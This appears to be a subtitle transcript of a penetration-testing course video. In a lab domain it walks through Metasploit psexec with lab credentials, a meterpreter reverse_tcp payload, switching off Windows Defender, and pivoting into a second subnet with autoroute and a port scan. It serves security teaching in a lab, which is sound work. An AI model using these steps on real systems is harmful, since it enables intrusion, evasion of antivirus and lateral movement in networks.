1 00:00:00,270 --> 00:00:02,210 Picking up right where we left off.
2 00:00:02,250 --> 00:00:05,200 So let's go ahead and use psexec.
3 00:00:05,550 --> 00:00:11,410 So I'm going to say use exploit/windows/smb/
4 00:00:11,460 --> 00:00:12,400 psexec.
5 00:00:13,170 --> 00:00:17,110 We'll say options, and then we are going to be at
6 00:00:17,130 --> 00:00:20,040 I'm actually going to make this full screen just for ease.
7 00:00:20,040 --> 00:00:25,650 We're going to set the RHOST to 192.168.57.141.
8 00:00:25,800 --> 00:00:27,640 That is Frank Castle's machine.
9 00:00:27,750 --> 00:00:38,070 We'll set SMBDomain to marvel.local, we'll set SMBPass to Password1, set SMBUser to fcastle.
10 00:00:39,120 --> 00:00:44,460 So go ahead and get all that typed out; if you need to pause at any time, if I'm typing too fast,
11 00:00:44,460 --> 00:00:45,820 just go ahead and pause.
12 00:00:45,960 --> 00:00:52,110 I'm trying to delay just a little bit here, but from here let's go ahead and set the payload to windows/
13 00:00:52,710 --> 00:00:54,730 and we'll say x64/
14 00:00:54,780 --> 00:01:05,970 meterpreter, and we'll say reverse_tcp, and then we'll set our LHOST to eth0. Type in options.
15 00:01:07,400 --> 00:01:09,720 And we should have all of our stuff set.
16 00:01:09,710 --> 00:01:14,480 So we've got the correct IP address, correct domain, password, user.
17 00:01:14,480 --> 00:01:15,550 And then we've got the
18 00:01:15,590 --> 00:01:16,810 correct
19 00:01:16,910 --> 00:01:17,920 LHOST here.
20 00:01:17,930 --> 00:01:24,560 So let's set the target to 2, remember that's the upload, the file upload. We'll go ahead and run this and see
21 00:01:24,560 --> 00:01:28,730 if it works, and we got status virus infected.
22 00:01:28,730 --> 00:01:30,400 Good job, Windows Defender.
23 00:01:30,500 --> 00:01:31,100 Let's go ahead.
24 00:01:31,100 --> 00:01:34,990 If your Defender kicked on, let's go ahead and just turn it off one more time.
25 00:01:35,150 --> 00:01:41,660 So what I'm going to do is I'm going to come over here and just go into Defender, and even though I have the
26 00:01:41,660 --> 00:01:44,650 group policy in here, it still comes back on for me. It hates me.
27 00:01:44,660 --> 00:01:48,820 So let's go ahead and manage settings and turn it off.
28 00:01:48,980 --> 00:01:52,460 Yes, let's do this one more time.
29 00:01:52,460 --> 00:01:59,180 So let's go in and run this exploit, and now we have a shell.
30 00:01:59,470 --> 00:01:59,820 OK.
31 00:01:59,850 --> 00:02:06,940 So from here, what we're going to do is we are going to look at the network.
32 00:02:06,940 --> 00:02:07,800 Let's get a shell.
33 00:02:07,960 --> 00:02:09,390 Let's just talk about this.
34 00:02:09,400 --> 00:02:12,440 This is some post exploitation, right?
35 00:02:12,460 --> 00:02:18,220 We want to run a route print and see what the routing is
36 00:02:18,250 --> 00:02:24,070 on this. I always do this and just check, and you can see there's 10.10.10.0 on here
37 00:02:24,460 --> 00:02:28,180 and the 192.168.57.0 in the routing table.
38 00:02:28,390 --> 00:02:30,280 So we know that there's two NICs.
39 00:02:30,280 --> 00:02:35,630 I mean, the other way to look at that is just say ipconfig and look at that right here, right?
40 00:02:35,650 --> 00:02:41,020 So when I do 57.141, 10.10.10.128, we could say arp
41 00:02:41,050 --> 00:02:48,630 -a and see what it's talking to in terms of machines that are out there, and we know that 128 exists.
42 00:02:48,640 --> 00:02:52,230 But look, it's also talking to 129.
43 00:02:52,230 --> 00:02:54,930 So we do know that 129 is out there.
44 00:02:54,930 --> 00:02:59,040 So how the heck do we make sure that we can talk to 129?
45 00:02:59,040 --> 00:03:08,160 Well, we're going to pivot here, and every time I say this I think of the Friends TV show, the whole pivot
46 00:03:08,160 --> 00:03:08,510 scene.
47 00:03:08,520 --> 00:03:09,900 If you've never seen that, with the couch,
48 00:03:09,900 --> 00:03:11,460 that's what I think about every time.
49 00:03:11,460 --> 00:03:13,620 Go ahead and Google it, it's pretty funny.
50 00:03:13,630 --> 00:03:17,070 I'm going to go ahead and hit Ctrl+C here and just back out.
51 00:03:17,370 --> 00:03:25,410 And then what we can do from here is we can actually just say run autoroute, and we're just going to
52 00:03:25,410 --> 00:03:31,000 say -s, and this is gonna set up a route for us to this network.
53 00:03:31,020 --> 00:03:37,460 So what we're doing is we're saying, hey, from the IP that we exploited, which was 192.168.57.
54 00:03:37,470 --> 00:03:39,300 0/24 network,
55 00:03:39,300 --> 00:03:43,260 go ahead and make a route from that to this through this machine.
56 00:03:43,260 --> 00:03:44,220 So we're going to do that
57 00:03:46,880 --> 00:03:48,440 and it's going to say it's deprecated.
58 00:03:48,440 --> 00:03:50,760 Don't worry, it's fine. And we'll
59 00:03:50,840 --> 00:04:01,920 come here. We added the route, and then now we can say run autoroute and then we can say -p, like
60 00:04:01,920 --> 00:04:03,690 it says, so lists all active routes.
61 00:04:03,690 --> 00:04:06,390 Make sure that we do have a route here, which we do.
62 00:04:06,390 --> 00:04:09,600 The route is going through session 1, which is appropriate.
63 00:04:09,600 --> 00:04:19,020 Now we can background this, and we can come in here and we can do something like search portscan, and
64 00:04:19,020 --> 00:04:22,400 we can just say use, we'll do 5.
65 00:04:22,410 --> 00:04:31,410 We'll do a scan. Options. Set our RHOSTS to 10.10.10.129, and we could do a ping
66 00:04:31,410 --> 00:04:32,840 sweep, we could do a lot of things here.
67 00:04:32,850 --> 00:04:38,760 But the proof of concept is that we're just trying to attack this machine, or just prove that we are
68 00:04:38,760 --> 00:04:40,800 pivoting into this other network.
69 00:04:40,950 --> 00:04:46,500 So what we're going to do as well is we're just going to say, I'm going to set the port to, I'll just pick
70 00:04:46,500 --> 00:04:52,260 445 because we know that's open, and we'll just run this, and you can see TCP open on 10.
71 00:04:52,260 --> 00:04:54,510 10.10.129.
72 00:04:54,510 --> 00:05:01,680 So we have successfully pivoted into this network through this other machine, and this is just one example
73 00:05:01,740 --> 00:05:02,820 of pivoting.
74 00:05:02,820 --> 00:05:08,490 But what's important right now is the concept of pivoting. You're going to pick this up over time, you'll
75 00:05:08,490 --> 00:05:12,960 learn all different kinds of tools, and you'll pick up your favorite tool that you like to use to pivot.
76 00:05:13,350 --> 00:05:19,710 But for now, just understanding the concept of pivoting and what it means is really important from a
77 00:05:19,710 --> 00:05:23,670 practical level. You will encounter this from time to time.
78 00:05:23,760 --> 00:05:29,410 I would say it's not high probability, but it doesn't mean that you won't encounter it.
79 00:05:29,650 --> 00:05:35,380 So understanding the concept of what it is, and then learning how to do it through tools such as Meterpreter
80 00:05:35,620 --> 00:05:41,380 or through something like proxychains, which we won't be covering, but you should read up on it. It's
81 00:05:41,440 --> 00:05:47,650 fantastic, it's a good topic to learn about, and again that tool is proxychains. If you're curious, you
82 00:05:47,650 --> 00:05:53,560 can utilize pivoting through a few different ways, not just Metasploit, but you can use SSH pivoting
83 00:05:53,560 --> 00:05:54,010 as well.
84 00:05:54,040 --> 00:05:59,260 SSH is open on the box, and there's different tools that will do a lot of the same thing, so I encourage
85 00:05:59,260 --> 00:06:01,020 you to read up on the topic.
86 00:06:01,300 --> 00:06:02,980 And from here, that's it.
87 00:06:02,980 --> 00:06:06,640 We're gonna go ahead and move into cleanup, and then we'll wrap up the networking section.